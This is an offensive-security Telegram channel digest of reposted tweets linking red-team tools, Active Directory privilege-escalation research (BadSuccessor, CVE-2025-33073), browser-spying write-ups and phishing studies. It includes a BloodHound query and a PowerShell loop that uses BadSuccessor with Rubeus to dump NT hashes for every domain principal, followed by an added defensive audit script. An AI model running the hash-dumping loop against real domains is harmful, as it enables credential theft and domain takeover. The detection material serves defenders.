Offensive Xwitter – Telegram
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
😈 [ Matt Ehrnschwender @M_alphaaa ]

I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.

🔗 https://github.com/MythicAgents/tetanus

🐥 [ tweet ]

ah, if only everything in the world could be rewritten in Rust 🦀 👍🏻 🦀 👍🏻
😁13🍌3👍2
😈 [ Steve S. @0xTriboulet ]

rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.

🔗 https://github.com/0xTriboulet/rssh-rs

🐥 [ tweet ]
👍1
😈 [ Yehuda Smirnov @yudasm_ ]

What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:

🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/

🐥 [ tweet ]
🔥9🥱2👍1
😈 [ Yuval Gordon @YuG0rd ]

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️
Read Here -

🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

🐥 [ tweet ]
🔥9
😈 [ Bad Sector Labs @badsectorlabs ]

// Collect the names of every computer that is a (transitive) member of Domain Controllers (RID 516)
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group)
WHERE g.objectsid ENDS WITH '-516'
WITH COLLECT(c1.name) AS dcs
// Keep only the enabled DCs whose operating system is Windows Server 2025
MATCH (c2:Computer)
WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs)
RETURN c2.name

If this query hits, you're in.

🐥 [ tweet ][ quote ]
👍5
😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

🔗 https://github.com/Pennyw0rth/NetExec/pull/702

🐥 [ tweet ][ quote ]
🔥11🥱3👍1
😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]
🔥6👍3🥱2
😈 [ Yuval Gordon @YuG0rd ]

Many missed this on #BadSuccessor: it's also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal: krbtgt, users, machines. No DCSync required, no code execution on the DC.

🐥 [ tweet ]

what an absolute beatdown 😂🤣

upd. for the record, the author does something like this, with his own build of Rubeus:

$domain = Get-ADDomain
# the dMSA the operator already controls
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
# every user and computer in the domain as DN + sAMAccountName
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
    + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    # point the dMSA's "preceded by" link at the next principal
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    # ask for a service ticket as the dMSA; Rubeus prints the predecessor's keys.
    # $kirbi is not defined in the snippet and is assumed to hold the ticket Rubeus uses for the request.
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    # pull the rc4_hmac (NT hash) value out of the "Previous Keys" section of the output
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
😁13🔥9🥱2
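A defender-side audit to pair with the post above, as an added example that is not from the post or from any of the tools it mentions: it lists every dMSA in the domain and shows which principal its msDS-ManagedAccountPrecededByLink points to, since the loop above rewrites that link once per principal. It assumes the ActiveDirectory module and that the dMSA objectClass is named msDS-DelegatedManagedServiceAccount; verify that name against your forest's schema.

```powershell
# Added example (not the channel's or Rubeus's code).
# Enumerate dMSAs and report where their "preceded by" link points.
# Assumption: objectClass msDS-DelegatedManagedServiceAccount is the dMSA class in your schema.
Import-Module ActiveDirectory

function Get-DmsaPredecessorLinks {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    $dmsas = Get-ADObject -LDAPFilter '(objectClass=msDS-DelegatedManagedServiceAccount)' `
        -SearchBase $SearchBase `
        -Properties 'msDS-ManagedAccountPrecededByLink', 'whenChanged'

    foreach ($d in $dmsas) {
        $link = $d.'msDS-ManagedAccountPrecededByLink'
        if (-not $link) {
            # no predecessor set: nothing to inherit, but still worth knowing the dMSA exists
            [pscustomobject]@{ dMSA = $d.DistinguishedName; PrecededBy = $null; TargetIsAdmin = $false; Changed = $d.whenChanged }
            continue
        }
        # the link is a DN; resolve it so we can see who the dMSA would inherit keys from
        $target = Get-ADObject -Identity $link -Properties sAMAccountName, adminCount
        [pscustomobject]@{
            dMSA          = $d.DistinguishedName
            PrecededBy    = $target.sAMAccountName
            TargetIsAdmin = [bool]$target.adminCount   # adminCount=1 marks protected (AdminSDHolder) accounts
            Changed       = $d.whenChanged            # a link that keeps changing looks like the loop above
        }
    }
}

# Print every dMSA, privileged-target ones first
Get-DmsaPredecessorLinks | Sort-Object TargetIsAdmin -Descending | Format-Table -AutoSize
```

A dMSA whose link targets an account no migration was ever planned for, or whose whenChanged keeps moving, deserves a look; with Directory Service Changes auditing enabled, each Set-ADObject in the loop above also produces an object-modified event (5136) naming that attribute, which is a cheap thing to alert on.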
😈 [ Matt Ehrnschwender @M_alphaaa ]

I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.

🔗 https://github.com/MEhrn00/boflink

Supporting blog post about it.

🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

🐥 [ tweet ]
🍌7😁1
Forwarded from PT SWARM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube — update immediately!
🔥25🥱1🍌1
😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

🐥 [ tweet ]
👍6🔥6
😈 [ Fabian @testert01 ]

Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.

@micahvandeusen, @_dirkjan, nice tools :)

🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/

🐥 [ tweet ]
👍6
😈 [ mr.d0x @mrd0x ]

Finally had some time to publish these blogs. Enjoy!

Spying On Screen Activity Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/

Camera and Microphone Spying Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/

🐥 [ tweet ]
👍7🥱4
😈 [ James Woolley @Xtrato ]

I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆

🐥 [ tweet ]
🥱20🍌7👍5😁3🤯1
😈 [ RedTeam Pentesting @RedTeamPT ]

🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.

🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:

🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/

👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:

🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf

🐥 [ tweet ]
🔥11
😈 [ Synacktiv @Synacktiv ]

Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Check out the details in the blog post by @yaumn_ and @wil_fri3d.

🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

🐥 [ tweet ]
🥱8👍4
😈 [ Praetorian @praetorianlabs ]

🚨 New attack disclosed: GitHub Device Code Phishing

John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.

📖 Blog covers methodology, red team case studies & detection strategies

🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/

🐥 [ tweet ]
🔥7
😈 [ Jonathan Beierle @hullabrian ]

I just released COMmander - a .NET tool designed to provide an easy to use interface for COM and RPC based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.

🔗 https://github.com/HullaBrian/COMmander

🐥 [ tweet ]
🔥4👍1
Forwarded from Positive Technologies
👽 Breaking into large financial companies is not only a goal for hackers, but also a challenge for the red teamers at PT SWARM

How the team prepared for and carried out attacks using social engineering, what came of it and how it helped clients is described in detail in an article for Positive Research by Konstantin Polishin, head of the Red Team SE group in the penetration testing department at Positive Technologies.

You'd be surprised how much can be learned about a company using nothing but passive reconnaissance. For example, the technology stack in use is easily found in IT job postings and employee résumés, and corporate email addresses in public data leaks and infostealer logs. And if you go looking actively, whole dossiers on the prospective targets can be assembled from various sources.

🎣 After that it only remains to carefully pick a focus group, build a phishing scenario and cast the line again and again until it works. To do this, red teamers (just like the attackers they imitate) closely study the contents of mailboxes, keywords in emails, the corporate communication style, and the company's internal life and processes.

👽👽 Want to see an attack from the inside in the finest detail? Read this cool investigative report, a new piece in our media.

#PositiveResearch
@Positive_Technologies
👍9🍌4